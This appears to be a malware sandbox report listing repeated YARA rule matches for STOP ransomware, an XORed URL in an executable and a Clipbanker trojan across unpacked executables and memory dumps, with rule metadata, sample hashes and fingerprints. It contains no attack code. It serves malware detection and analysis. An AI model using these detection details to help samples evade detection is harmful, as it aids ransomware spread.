Source: 9.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.343989029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
